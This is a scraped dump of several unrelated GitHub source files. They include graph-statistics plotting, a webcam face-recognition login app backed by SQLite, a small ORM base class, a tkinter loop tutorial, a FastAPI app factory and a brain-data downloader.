\"nb_attributs\")\n# l2 = [*zip(*data_er)]\n# plt.figure()\n# plt.plot(np.array(l2[0]), np.array(l2[1]), '+')\n# plt.title(\"Nombre d'attributs en fonction du nombre de sommets - Erdos-Renyi\")\n# plt.xlim([2, 22])\n# plt.xticks(np.arange(3, 22))\n# plt.xlabel(\"Nombre de noeuds\")\n# plt.ylabel(\"Nombre d'attributs\")\n#\n#\n# data_er = traitement_par_nb_nodes(\"Erdos_Renyi\", \"nb_attributs\", 21)\n# l2 = [*zip(*data_er)]\n# regression_poly_et_exp(l2, 21, \"Erdos-Renyi\")\n#\n#\n# ### Watts-Strogatz : Maximum, Minimum, Moyenne, Variance et Nuage de points ###\n#\n#\n# data_ws = traitement(\"Watts_Strogatz\", \"nb_attributs\")\n# l3 = [*zip(*data_ws)]\n# plt.figure()\n# plt.plot(np.array(l3[0]), np.array(l3[1]), '+')\n# plt.title(\"Nombre d'attributs en fonction du nombre de sommets - Watts-Strogatz\")\n# plt.xlim([2, 16])\n# plt.xticks(np.arange(3, 16))\n# plt.xlabel(\"Nombre de noeuds\")\n# plt.ylabel(\"Nombre d'attributs\")\n#\n# data_ws = traitement_par_nb_nodes(\"Watts_Strogatz\", \"nb_attributs\", 15)\n# l3 = [*zip(*data_ws)]\n# regression_poly_et_exp(l3, 15, \"Watts-Strogatz\")\n\ndata_all = traitement_par_nb_nodes_list([\"Erdos_Renyi\", \"Watts_Strogatz\", \"Barabasi_Albert\"], \"nb_attributs\", 21)\nl3 = [*zip(*data_all)]\nregression_poly_et_exp(l3, 21, \"Tous\")\nplt.figure()\nplt.plot(np.array(l3[0]), np.array(l3[1]), '+')\nplt.title(\"Nombre d'attributs en fonction du nombre de sommets\")\nplt.xlim([2, 22])\nplt.xticks(np.arange(3, 21))\nplt.xlabel(\"Nombre de noeuds\")\nplt.ylabel(\"Nombre d'attributs\")\n\n#\n# data_dens_ba = traitement_dens(\"Watts_Strogatz\")\n# l = [*zip(*data_dens_ba)]\n#\n# colors = []\n#\n# n_col = {\n# 3: \"black\",\n# 4: \"gray\",\n# 5: \"brown\",\n# 6: \"red\",\n# 7: \"salmon\",\n# 8: \"orange\",\n# 9: \"yellow\",\n# 10: \"greenyellow\",\n# 11: \"limegreen\",\n# 12: \"lime\",\n# 13: \"turquoise\",\n# 14: \"cyan\",\n# 15: \"deepskyblue\",\n# 16: \"blue\",\n# 17: \"indigo\",\n# 18: \"purple\",\n# 19: \"fuchsia\",\n# 20: \"hotpink\",\n# 21: \"pink\",\n# }\n#\n# for n in l[0]:\n# colors.append(n_col[n])\n#\n# for i in range(len(l[0])):\n# plt.plot(l[2][i], l[1][i], '+', color=colors[i])\n# plt.title(\"Densité en fonction du nombre d'attributs\")\n# plt.ylabel(\"Densité\")\n# plt.xlabel(\"Nombre d'attributs\")\n#\n# plt.figure()\n# data_diam_ba = traitement_diam(\"Watts_Strogatz\")\n# l = [*zip(*data_diam_ba)]\n#\n# colors = []\n#\n#\n# for n in l[0]:\n# colors.append(n_col[n])\n#\n# for i in range(len(l[0])):\n# plt.plot(l[2][i], l[1][i], '+', color=colors[i])\n# plt.title(\"Diamètre en fonction du nombre d'attributs\")\n# plt.ylabel(\"Diamètre\")\n# plt.xlabel(\"Nombre d'attributs\")\n\n# plt.figure()\n# plt.plot(np.arange(3, 18, 0.01), y)\n# plt.plot(np.arange(3, 18), np.array(l1[1]), '+')\n\n# data_all = traitement_par_nb_nodes_list([\"Barabasi_Albert\", \"Erdos_Renyi\", \"Watts_Strogatz\"], \"nb_attributs\", 20)\n# l_all = [*zip(*data_all)]\n#\n# plt.figure()\n# plt.plot(np.arange(3, 21), np.array(l_all[0]), label=\"Minimum\")\n# plt.plot(np.arange(3, 21), np.array(l_all[1]), label=\"Maximum\")\n# data = traitement(\"Barabasi_Albert\", \"nb_attributs\") + traitement(\"Erdos_Renyi\", \"nb_attributs\") + traitement(\"Watts_Strogatz\", \"nb_attributs\")\n#\n# plt.plot(*zip(*data), '+')\n\n## Pour déterminer le nombre de points à chaque coordonnée\n\n\n## Poucentage à chaque coordonnées\n\n# nb_graphe = {}\n# for n in range(3, 21):\n# somme = 0\n# for a in range(l_all[0][n - 3], l_all[1][n - 3] + 1):\n# nb = data.count((n, a))\n# somme += nb\n# nb_graphe[n] = somme\n#\n# for n in range(3, 21):\n# for a in range(l_all[0][n-3], l_all[1][n-3]+1):\n# nb = (100*data.count((n, a)))/nb_graphe[n]\n# if nb > 0:\n# if nb < 1:\n# color = \"cyan\"\n# elif nb < 2:\n# color = \"turquoise\"\n# elif nb < 3:\n# color = \"lime\"\n# elif nb < 4:\n# color = \"orange\"\n# elif nb < 5:\n# color = \"yellow\"\n# else:\n# color=\"red\"\n# occu[(n, a)] = color\n#\n# plt.figure()\n# for coords in occu:\n# plt.plot(coords[0], coords[1], '+', color=occu[coords])\n\n\n# nb_graphe = {}\n# for n in range(3, 21):\n# somme = 0\n# for a in range(l_all[0][n - 3], l_all[1][n - 3] + 1):\n# nb = data.count((n, a))\n# somme += nb\n# nb_graphe[n] = somme\n#\n# occu = {}\n# for n in range(3, 21):\n# occu[n] = {}\n# for a in range(l_all[0][n - 3], l_all[1][n - 3] + 1):\n# nb = data.count((n,a))\n# occu[n][a] = nb\n#\n# sort_occu = {}\n#\n# total = {}\n#\n# for n in range(3, 21):\n# sort_occu_n = sorted(occu[n].items(), key=lambda x: x[1], reverse=True)\n# sort_occu[n] = sort_occu_n\n# total[n] = len(sort_occu_n)\n#\n# colors = {}\n# for n in sort_occu:\n# tot = total[n]\n# part = tot/6\n# i = 1\n# for a in sort_occu[n]:\n# print(i, part, tot)\n# if i < part or i == 1:\n# color = \"red\"\n# elif i < 2*part or i == 2:\n# color = \"orange\"\n# elif i < 3*part or i == 3:\n# color = \"yellow\"\n# elif i < 4*part or i == 4:\n# color = \"lime\"\n# elif i < 5*part or i == 5:\n# color = \"turquoise\"\n# else:\n# color = \"cyan\"\n# colors[(n, a[0])] = color\n# i += 1\n#\n#\n# plt.figure()\n# for coords in colors:\n# print(coords)\n# plt.plot(coords[0], coords[1], '+', color=colors[coords])\n\n\n# data = traitement_nodes(\"Barabasi_Albert\", \"plus_petit_attribut\", \"closness_centrality\")\n#\n# plt.plot(*zip(*data), '+')\n# plt.show()\n\nplt.show()\n","repo_name":"mlegoue/convex","sub_path":"Aleatoire/traitement.py","file_name":"traitement.py","file_ext":"py","file_size_in_byte":14848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20487805278","text":"import io\nimport cv2\nimport sqlite3\nimport numpy as np\nimport face_recognition\n\nfrom time import sleep\nfrom threading import Thread\nfrom sqlite3 import Error\nfrom PIL import Image, ImageTk, UnidentifiedImageError\n\nfrom front.interface import Interface\n\nclass MenuPrincipal(Interface):\n def _conecxao_db(page):\n try:\n return sqlite3.connect(\"database/pessoas.db\", detect_types = sqlite3.PARSE_DECLTYPES)\n except sqlite3.OperationalError:\n from os import mkdir\n mkdir('database')\n finally:\n return sqlite3.connect(\"database/pessoas.db\", detect_types = sqlite3.PARSE_DECLTYPES)\n\n def _tabela_registros_existe(page, cur):\n return not(cur.execute(\"\"\"SELECT name FROM sqlite_master WHERE type='table' AND name='registros';\"\"\").fetchall() == [])\n\n def _adaptar_array(page, arr):\n out = io.BytesIO()\n np.save(out, arr)\n out.seek(0)\n return sqlite3.Binary(out.read())\n\n def _converter_array(page, text):\n out = io.BytesIO(text)\n out.seek(0)\n return np.load(out)\n\n def _webcam_durante_registro(page):\n cap = cv2.VideoCapture(0, cv2.CAP_DSHOW) \n\n def mostrar_webcam():\n page._criar_frame_webcam()\n\n try:\n while True:\n _, page.captura_webcam = cap.read()\n page.captura_webcam = cv2.flip(page.captura_webcam, 1)\n page.captura_webcam = cv2.resize(page.captura_webcam, (430, 350)) \n cv2image = cv2.cvtColor(page.captura_webcam, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(image = img)\n\n if page.webcam_frame.winfo_exists():\n page.webcam_frame.imgtk = imgtk\n page.webcam_frame.configure(image = imgtk)\n else: \n break\n\n if page.continuar_mostrando_webcam:\n sleep(0.01) \n cv2.destroyAllWindows()\n while not page.continuar_mostrando_webcam:\n sleep(0.005)\n \n except cv2.error:\n page._tela_de_aviso(\"Ocorreu um erro!\\nSua webcam não está disponível.\")\n page.frame_registro.destroy()\n\n page.thread1 = Thread(target = mostrar_webcam, daemon = True)\n page.thread1.start()\n\n def _botao_login_clicado(page):\n sqlite3.register_converter(\"array\", page._converter_array) \n \n conn = page._conecxao_db()\n cur = conn.cursor()\n\n if page._tabela_registros_existe(cur):\n page._criar_interface_login()\n\n Thread(target = page._login_webcam, daemon = True).start()\n Thread(target = page._login_validacao, args = (cur.execute(\"SELECT * FROM registros\").fetchall(), ), daemon = True).start() \n else:\n page._tela_de_aviso(\"Não há ninguém registrado no momento!\") \n\n conn.close()\n\n def _login_webcam(page):\n trained_data = cv2.CascadeClassifier('./frontal-face-data.xml')\n webcam = cv2.VideoCapture(0, cv2.CAP_DSHOW)\n\n page._criar_frame_webcam()\n\n def mostrar_webcam():\n try:\n _, page.captura_webcam = webcam.read()\n page.captura_webcam = cv2.flip(page.captura_webcam, 1)\n page.captura_webcam = cv2.resize(page.captura_webcam, (430, 350))\n\n for (x, y, w, h) in trained_data.detectMultiScale(cv2.cvtColor(page.captura_webcam, cv2.COLOR_BGR2GRAY)):\n cv2.rectangle(page.captura_webcam, (x, y), (x + w, y + h), (0, 255, 0), 2)\n \n imgtk = ImageTk.PhotoImage(image = Image.fromarray(cv2.cvtColor(page.captura_webcam, cv2.COLOR_BGR2RGBA)))\n page.webcam_frame.imgtk = imgtk\n page.webcam_frame.configure(image = imgtk)\n page.webcam_frame.after(10, mostrar_webcam)\n except (TypeError, cv2.error):\n pass \n mostrar_webcam()\n\n def _login_validacao(page, pessoas):\n def atualizar_texto_validando():\n while page.continuar_atualizando_texto:\n for i in range(4):\n if page.continuar_atualizando_texto:\n page.texto_validando.configure(text = \"VALIDANDO\" + ('.' * i))\n sleep(0.5)\n else:\n break\n\n while True:\n t = Thread(target = atualizar_texto_validando)\n try:\n encoding_desconhecida = face_recognition.face_encodings(page.captura_webcam)[0]\n\n page.texto_validando.place(relx = 0.439, rely = 0.867, height = 19, width = 200)\n page.continuar_atualizando_texto = True\n t.start()\n \n for registrado in pessoas:\n encoding_img_registrada = face_recognition.face_encodings(registrado[2])[0]\n resultado = face_recognition.compare_faces([encoding_img_registrada], encoding_desconhecida, tolerance = 0.6)\n \n if resultado[0]:\n sleep(2)\n cv2.destroyAllWindows()\n page.continuar_atualizando_texto = False \n page.frame_feed_webcam.destroy()\n page._exibir_dados_confidenciais(registrado[0], registrado[1])\n break\n \n if resultado[0]:\n break\n else:\n page.continuar_atualizando_texto = False\n page.texto_validando.place(relx=0.285, rely=0.867, height=19, width=300)\n page.texto_validando.configure(text=\"Você não está cadastrado neste banco de dados.\")\n sleep(2)\n\n except (IndexError, FileNotFoundError, UnidentifiedImageError):\n if page.frame_login.winfo_exists():\n page.texto_validando.place(relx=0.325, rely=0.867, height=19, width=200)\n page.texto_validando.configure(text=\"Não foi possível identificar uma face.\")\n sleep(2) \n except TypeError:\n page.frame_login.destroy()\n page._tela_de_aviso(\"Ocorreu um erro!\\nSua webcam não está disponível.\")\n break\n except AttributeError:\n sleep(0.3)\n\n def _salvar_database(page, nome, cargo):\n def ja_cadastrado(pessoas):\n try:\n encoding_desconhecida = face_recognition.face_encodings(page.captura_webcam)[0]\n\n for registrado in pessoas:\n encoding_img_registrada = face_recognition.face_encodings(registrado[2])[0]\n resultado = face_recognition.compare_faces([encoding_img_registrada], encoding_desconhecida, tolerance = 0.6)\n \n if resultado[0]:\n return 1\n return 0\n except (IndexError, FileNotFoundError, UnidentifiedImageError):\n return -1\n\n sqlite3.register_converter(\"array\", page._converter_array)\n sqlite3.register_adapter(np.ndarray, page._adaptar_array)\n\n conn = page._conecxao_db() \n cur = conn.cursor()\n cur.execute(\"CREATE TABLE IF NOT EXISTS registros (nome text, cargo int, arr array)\")\n\n temp = ja_cadastrado(cur.execute(\"SELECT * FROM registros\").fetchall())\n if temp == 1:\n page._tela_de_aviso(\"Você já está registrado neste programa.\")\n page.continuar_mostrando_webcam = True\n page.botao_confirmar_registro.lower()\n elif temp == 0: \n cur.execute(\"INSERT INTO registros (nome, cargo, arr) VALUES (?, ?, ?)\", (nome, cargo, page.captura_webcam, ))\n conn.commit()\n page.thread1.join(0.001)\n page.frame_registro.destroy()\n page._tela_de_aviso(\"Você foi registrado com sucesso!\")\n elif temp == -1:\n page._tela_de_aviso(\"Nenhum rosto foi detectado na imagem.\")\n page.continuar_mostrando_webcam = True\n page.botao_confirmar_registro.lower()\n \n conn.close()\n\nif __name__ == \"__main__\":\n MenuPrincipal()","repo_name":"biarodriguesch/Login_reconhecimento_facial","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8477,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26029822","text":"from inspect import getmembers\nfrom DatabaseInterface import DBInterface\nfrom config import TYPE_MAPPING\n\n\nclass ModelBase(object):\n \"\"\"\n The Base Model class\n \n All other models should be based on this class\n \n Models can set their own instance variables by declaring them as class\n variables and setting a specification tuple like so\n \n class TheClass(ModelBase):\n title = (default,pythonType,SQLType,validationFunction)\n \n where \n default is a default value for intialization\n pythonType is a Python type for the value, used in validation\n SQLType is a string representing an SQL type such as \"integer\" or \"varchar\"\n used when saving the value to the database or creating the table\n validationFunction (optional) a function that takes one argument and\n returns either True or an error message\n \n Instances should only be created using the \"create\" method of the model, such as\n \n the_class_instance = TheClass.create()\n \n __dict__ structure\n ['status'] - data not needed in the database`\n ['_is_dirty'] - if the model has been updated since its last save\n ['attrs'] - data NEEDED in the database\n ['id'] - the primary key of the model in the database\n columns defined in the child class\n \"\"\"\n #holds the one database connection for all models\n db_interface = DBInterface.get_interface()\n \n #dict to track all model instances\n #key is the class and value is a list of all instances\n all_models = {}\n \n \"\"\"\n holds model-specific information\n format\n [classname] - the name of the class that inherits from ModelBase\n ['tablename'] - stores the name of the table used in the database\n ['table_exists'] - stores True once the database has checked for the table\n and found it\n ['has_been_checked'] - stores True if the model has successfully passed the \n tests in ModelBase.check_model\n \"\"\"\n model_data = {}\n\n\n @classmethod\n def get_all_models(cls):\n \"\"\"\n returns a list of all instances of a given model class\n instances are tracked in ModelBase.all_models\n \"\"\"\n if not ModelBase.all_models.has_key(cls):\n return []\n #return a copy of the list so that the actual list cannot be altered \n #by the caller\n return ModelBase.all_models[cls][:]\n \n @classmethod\n def track_model(cls,model):\n \"\"\"\n adds an instance of a model to the tracking dictionary, ModelBase.all_models\n \"\"\"\n if not ModelBase.all_models.has_key(cls):\n ModelBase.all_models[cls] = [model]\n return\n ModelBase.all_models[cls].append(model)\n\n @classmethod\n def create(cls):\n \"\"\"\n returns a new instance of the Model\n initializes the __dict__ attribute using the specification tuple from the \n class from which it is called\n \"\"\"\n result = cls.check_model()\n if result != True:\n print(result)\n return None\n m = ModelBase()\n m.__dict__['status'] = {'_is_dirty':True}\n m.__dict__['status']['child_class'] = cls\n m.__dict__['attrs'] = {}\n for attr in cls.get_super_attrs():\n m.__dict__['attrs'][attr] = getattr(cls,attr)[0]\n cls.track_model(m)\n m.set_tablename()\n return m\n \n @classmethod\n def check_model(cls):\n \"\"\"\n checks the format of the specification tuples in the child class definition\n \"\"\"\n this_func_name = \"ModelBase.check_model\"\n if ModelBase.model_data.has_key(cls) and \\\n ModelBase.model_data[cls].has_key(\"has_been_checked\") and \\\n ModelBase.model_data[cls][\"has_been_checked\"] == True:\n return True\n for attr in cls.get_super_attrs():\n spec_tuple = getattr(cls,attr)\n if type(spec_tuple[0]) not in TYPE_MAPPING.keys():\n #error message 0\n return error_message(this_func_name,0,(cls,spec_tuple[0],type(spec_tuple[0])))\n if spec_tuple[1] not in TYPE_MAPPING.keys():\n #error message 1\n return error_message(this_func_name,1,(cls,spec_tuple[1]))\n sql_types = []\n for val in TYPE_MAPPING.values():\n if isinstance(val,list):\n sql_types += [v.lower() for v in val] \n else:\n sql_types.append(val.lower())\n sql_types.append(\"serial primary key\")\n if spec_tuple[2].lower() not in sql_types:\n #error message 2\n return error_message(this_func_name,2,(cls,spec_tuple[2]))\n if len(spec_tuple) > 3:\n if not hasattr(spec_tuple[3],'__call__'):\n #error message 3\n return error_message(this_func_name,3,(cls,spec_tuple[3]))\n if spec_tuple[0] != None:\n if type(spec_tuple[0]) != spec_tuple[1]:\n #error message 4\n return error_message(this_func_name,4,(cls,spec_tuple[0],spec_tuple[1]))\n if not ModelBase.model_data.has_key(cls):\n ModelBase.model_data[cls] = {}\n if not ModelBase.model_data[cls].has_key(\"has_been_checked\"): \n ModelBase.model_data[cls][\"has_been_checked\"] = True\n return True\n \n @classmethod\n def get_super_attrs(cls):\n \"\"\"\n returns strings representing the attribute names of the calling class\n only returns attributes that are not part of ModelClass\n it should only return the names of the specification tuples\n uses inspect.getmembers\n \"\"\"\n all_attrs = [x[0] for x in getmembers(cls)]\n model_base_attrs = [x[0] for x in getmembers(ModelBase)]\n super_attrs = []\n for attr in all_attrs:\n #skip it if it's a builtin\n if attr.startswith('__'):\n continue\n #skip it if it's in ModelBase\n if attr in model_base_attrs:\n continue\n super_attrs.append(attr)\n return super_attrs\n\n def set_tablename(self):\n \"\"\"\n creates the tablename and saves it into the ModelBase.model_data dict at \n model_data['tablename']\n the tablename is just the all lowercase classname with '_table' appended\n \"\"\"\n the_class = self.child_class\n if not ModelBase.model_data.has_key(the_class):\n ModelBase.model_data[the_class] = {}\n if not ModelBase.model_data[the_class].has_key(\"tablename\"):\n the_name = the_class.__name__.lower() + \"_table\"\n ModelBase.model_data[the_class][\"tablename\"] = the_name\n \n def get_tablename(self):\n \"\"\"\n retrieves the tablename from ModelBase.model_data[\"tablename\"]\n \"\"\"\n return ModelBase.model_data[self.child_class]['tablename']\n \n def __getattr__(self,attr):\n \"\"\"\n overrides base __getattr__ functionality to use __dict__\n \"\"\"\n if attr.lower() == 'tablename':\n return self.get_tablename()\n if self.__dict__['status'].has_key(attr):\n return self.__dict__['status'].get(attr)\n if self.__dict__['attrs'].has_key(attr):\n return self.__dict__['attrs'].get(attr)\n return None\n\n def get_columns(self):\n \"\"\"\n returns self.__dict__['attrs'] which contains the data that the database\n cares about\n \"\"\"\n return self.__dict__['attrs'].copy()\n\n def __setattr__(self,name,value):\n \"\"\"\n overrides base __setattr__ functionality to use __dict__\n uses the Python type defined in the specification tuple of the class for \n validation and will case the 'value' as the Python type if necessary\n uses the optional custom validation function defined in the specification\n tuple if it exists\n prints error messages if it encounters an issue\n \"\"\"\n #don't allow direct setting of __dict__\n this_func_name = \"ModelBase.__setattr__\"\n if name == \"__dict__\":\n return\n if self.__dict__['status'].has_key(name):\n self.__dict__['status'][name] = value\n return None\n if not self.__dict__['attrs'].has_key(name):\n #error message 5\n print(error_message(this_func_name,5,(name,self.child_class)))\n return None\n #TYPE VALIDATION\n specification = getattr(self.child_class,name)\n correct_type = specification[1]\n if not isinstance(value,correct_type):\n try:\n value = correct_type(value)\n except:\n #error message 6\n print(error_message(this_func_name,6,(value,correct_type,self.child_class)))\n return None\n if len(specification) <= 3:\n #set the value if there is not custom validation\n self.__dict__['attrs'][name] = value\n return None\n #CUSTOM VALIDATION\n validator = specification[3]\n result = validator(value)\n if result == True:\n self.__dict__['attrs'][name] = value\n else:\n #error message 7\n print(error_message(this_func_name,7,(value,validator,result,self.child_class)))\n return None\n #if we make it all the way to the end, the value has been set and the object\n #is now different from that in the database\n self.__dict__['status']['_is_dirty'] = True\n \n def verify_table_exists(self):\n \"\"\"\n check if the table for this model exists in the database and create it\n if necessary\n once it exists, set the model_data[class]['table_exists'] flag to True\n \"\"\"\n if ModelBase.model_data[self.child_class].get('table_exists'): return True\n if ModelBase.db_interface.does_table_exist(self.get_tablename()):\n ModelBase.model_data[self.child_class]['table_exists'] = True\n return True\n col_dict = {}\n for col in self.get_columns():\n col_dict[col] = getattr(self.child_class,col)[2]\n ModelBase.db_interface.create_table(self.get_tablename(),col_dict)\n ModelBase.model_data[self.child_class]['table_exists'] = True\n return True\n \n def save(self):\n \"\"\"\n save the model to the database\n if it's the first save, record the returned ID\n set _is_dirty to False\n \"\"\"\n self.verify_table_exists()\n if not self.id:\n self.id = ModelBase.db_interface.save_to_table(self.tablename,self.get_columns())\n elif self._is_dirty:\n ModelBase.db_interface.save_to_table(self.tablename,self.get_columns())\n self._is_dirty = False\n\n\ndef error_message(caller,err_num,tup):\n err_dict = {}\n err_dict[0] = [\"Class: %s has a default value of %s with type %s\", \\\n \"Supported default value types are the keys in config.TYPE_MAPPING\"]\n err_dict[1] = [\"Class: %s has a Python type of %s, which is not supported\", \\\n \"Supported Python types are the keys in config.TYPE_MAPPING\"]\n err_dict[2] = [\"Class: %s has an SQL type of %s, which is not supported\", \\\n \"Supported SQL types are the values in config.TYPE_MAPPING\"]\n err_dict[3] = [\"Class: %s has validator %s, which is not a function\", \\\n \"Item 4 must a function that takes one arg and returns a boolean\"]\n err_dict[4] = [\"Class: %s has has default value %s, which is not of Python type %s\", \\\n \"The default value must be None or the Python type in item 2\"]\n err_dict[5] = [\"No attr '%s' in this model\",\\\n \"Class: %s\"]\n err_dict[6] = [\"Value '%s' is of wrong type and cannot be cast as '%s'\",\\\n \"Class: %s\"]\n err_dict[7] = [\"Value '%s' failed custom validation in '%s'\", \\\n \"Error message from validator: %s\", \\\n \"Class: %s\"]\n final_message = \"ERROR in \" + caller + \"\\n\"\n for line in err_dict[err_num]:\n final_message += \"\\t\" + line + \"\\n\"\n return final_message % tup\n\n\n### EVERYTHING BELOW THIS LINE IS FOR TESTING ###\nif __name__ == \"__main__\":\n from random import randint\n \n def year_validator(year):\n if year < 1870:\n return \"Year must be greater than 1869\"\n return True\n \n class RealClass(ModelBase):\n id = (None,int,\"serial PRIMARY KEY\")\n title = (None,str,\"varchar\")\n year = (None,int,\"integer\",year_validator)\n \n\n class GoodModel(ModelBase):\n valid_attr = (\"valid\",str,\"varchar\")\n valid_attr2 = (True,bool,\"bool\")\n valid_attr3 = (17,int,\"smallint\",lambda x:x>10)\n \n class BadModel1(ModelBase):\n invalid_attr = (type,str,\"varchar\")\n \n class BadModel2(ModelBase):\n invalid_attr2 = (None,17,\"text\")\n \n class BadModel3(ModelBase):\n invalid_attr3 = (None,str,\"NOTSQL\")\n \n class BadModel4(ModelBase):\n invalid_attr4 = (17,str,\"integer\")\n\n m1 = RealClass.create()\n m2 = RealClass.create()\n m1.title = \"Back to the Future\"\n m1.year = \"1850\"\n m1.fake = 17\n assert (m1.title == \"Back to the Future\")\n assert (m1.year == None)\n assert (m1.fake == None)\n assert (m1 != m2)\n assert (m1.db_interface == m2.db_interface)\n assert (m1 in RealClass.get_all_models())\n assert (m2 in RealClass.get_all_models())\n m2.year = \"2000\"\n assert (m2.year == 2000)\n assert (m1._is_dirty)\n assert (m2._is_dirty)\n assert (m1.get_tablename() == \"realclass_table\")\n assert (GoodModel.check_model() == True)\n assert (BadModel1.create() == None)\n assert (BadModel2.create() == None)\n assert (BadModel3.create() == None)\n assert (BadModel4.create() == None)\n m1.save()\n assert (m1.id != None)\n","repo_name":"ajtmccarty/mediaTools","sub_path":"ModelBase.py","file_name":"ModelBase.py","file_ext":"py","file_size_in_byte":12740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14495184640","text":"import tkinter\n\ncanvas = tkinter.Canvas(height = 1000, width = 1000)\ncanvas.pack()\n\nx = 10\n\n# Pokial chceme nejaku cast kodu zopakovat n- krat, vieme ju vlozit do for cyklu.\n# Pocet opakovani uvedieme do zatvorky za range.\n# Tento nas kod sa zopakuje 15krat.\nfor i in range(15):\n# Kod, ktory chceme opakovat, musime odsadit pomocou tabu\n canvas.create_rectangle(x+10,30,x+30,70, fill = \"brown\")\n canvas.create_oval(x,10,x+40,30, fill = \"green\")\n x = x + 50\n\ny = 100\n\n# i-cko nabera rozne hodnoty podla toho, co je v zatvorke za range.\n# Ak je v nej iba jedno cislo n, tak i bude nedobudat hodnoty od 0 po n-1.\n\n# Vypis cisla od 0 do 9.\nfor i in range(10):\n canvas.create_text(20,y, text = i)\n y = y + 30\n\ny = 100\n\n# Ak su v zatvorke 2 cisla, prve z nich je prva hodnota, ktoru nadobudne,\n# druhe bude opat horna hranica.\n# range(a,n) teda vypise cisla od a do n-1\n\n# Vypis cisla od 1 do 10.\nfor i in range(1,11):\n canvas.create_text(50,y, text = i)\n y = y + 30\n\ny = 100\nfor i in range(10):\n canvas.create_text(80,y, text = i+1)\n y = y + 30\n \ny = 100\n\n# Ak su v zatvorke 2 cisla, prve z nich je prva hodnota, ktoru nadobudne,\n# druhe bude opat horna hranica, tretie velkost kroku, o ktoru sa cisla i zvacsuju.\n# range(a,n,b) teda vypise cisla: a, a+b, a+b+b... n-1\n\n\n# Vypis parne cisla mensie ako 10\nfor i in range(0,10,2):\n canvas.create_text(110,y, text = i)\n y = y + 30\n\ny = 100\nfor i in range(5):\n canvas.create_text(140,y, text = i*2)\n y = y + 30\n\ny = 100\n\n# Vypis cisla od 50 do 40\nfor i in range(50,40,-1):\n canvas.create_text(170,y, text = i)\n y = y + 30\n\n\ny = 100\nfor i in range(10):\n canvas.create_text(200,y, text = 50-i)\n y = y + 30\n","repo_name":"lootikfc/EvlPythonDruhaci","sub_path":"Cykly.py","file_name":"Cykly.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"sk","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72508912167","text":"from fastapi import FastAPI\n\nfrom instance import settings\nfrom lebonplantapi import controllers\nfrom lebonplantapi.adapters import database\nfrom lebonplantapi.logging import configure_logging\n\n\ndef create_app(name: str = __name__) -> FastAPI:\n\n app = FastAPI(\n title=name,\n version=settings.application_version,\n openapi_url=settings.openapi_url,\n docs_url=settings.swagger_ui_url,\n redoc_url=settings.redoc_url,\n debug=settings.fastapi_debug,\n )\n\n if not settings.fastapi_debug:\n configure_logging(settings.log_level)\n\n controllers.init_app(app)\n database.init_db()\n\n return app\n","repo_name":"LiquidNalee/LeBonPlantAPI","sub_path":"lebonplantapi/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70190820650","text":"\n\nimport api\nimport numpy as np\nimport json\n\nDATA_SET_ID = 479670988 # injection site at LGd\n\t\ndef DownloadInjectionCoordinates(dataSetId, injectionMaskThreshold):\n print(\"downloading injection mask coordinates\")\n header, arr, meta = api.DownloadDataSetVolume(dataSetId, 'injection') # note: most values in arr are just simply 0\n\n\t\n spacing = np.array(meta['ElementSpacing'])\n coords = np.argwhere(arr > injectionMaskThreshold) * spacing\n \n return coords.tolist() # injection coordinates in μm\n\ndata = {\n \"lines\": [],\n \"destinationCoordinates\": DownloadInjectionCoordinates(DATA_SET_ID, INJECTION_MASK_THRESHOLD)\n}\n\nabc = data['destinationCoordinates']\n\nwith open('data.json', 'wb') as f:\n f.write(json.dumps(data).encode())","repo_name":"lanstonchu/brain-connectivity","sub_path":"download_injection_only.py","file_name":"download_injection_only.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33599317200","text":"# Solve 2023-06-06\n\nimport sys\nfrom decimal import *\n\ngetcontext().prec = 70\ngetcontext().rounding = ROUND_HALF_UP\n\ninput = lambda : sys.stdin.readline().rstrip()\n\nfor _ in range(int(input())):\n ans = Decimal(\"0\")\n\n while True:\n x = input()\n if x == \"0\":\n break\n ans += Decimal(x)\n\n ans = str(ans)\n while ans.find(\".\") != -1 and ans[-1] == \"0\":\n ans = ans[:-1]\n if ans[-1] == \".\":\n ans = ans[:-1]\n print(ans)\n","repo_name":"infikei/algorithm","sub_path":"baekjoon_all/09000+/boj_9411.py","file_name":"boj_9411.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"19702171911","text":"\n\nclass Region(object):\n \"\"\"\n Stores info on signal / control region. Bits are stored as strings\n and used to look up real values. This class is also responsible for\n checking the integrity of its stored data.\n \"\"\"\n default_dict = {\n 'selection': 'signal',\n 'type':'signal',\n 'kinematics':{\n 'leading_jet_gev':240,\n 'met_gev':180,\n },\n 'btag_config':['NOTAG','LOOSE','TIGHT'],\n 'tagger':'JFC',\n 'jet_tag_assignment': 'PT_ORDERED'\n }\n _allowed_types = set(['control','signal','validation'])\n\n def __init__(self, yaml_dict={}):\n if not yaml_dict:\n yaml_dict = self.default_dict\n self._read_dict(yaml_dict)\n\n def __repr__(self):\n return repr(self.get_yaml_dict())\n\n def _read_dict(self,yaml_dict):\n self.type = yaml_dict['type']\n self.kinematics = yaml_dict['kinematics']\n self.btag_config = yaml_dict['btag_config']\n if self.type not in self._allowed_types:\n raise RegionConfigError('region type {} is not known'.format(\n self.type))\n self.tagger = yaml_dict.get('tagger', None)\n self.hists = yaml_dict.get('hists', 'NMINUS')\n self.jet_tag_assignment = yaml_dict.get(\n 'jet_tag_assignment','PT_ORDERED')\n self.boson_pt_correction = yaml_dict.get(\n 'boson_pt_correction', 'MARKS')\n\n def get_yaml_dict(self):\n \"\"\"\n returns the object as a dict for yaml\n \"\"\"\n # as long as the names don't change we can just dump the object data\n baselist = self.__dict__.items()\n base = {k:v for k, v in baselist if 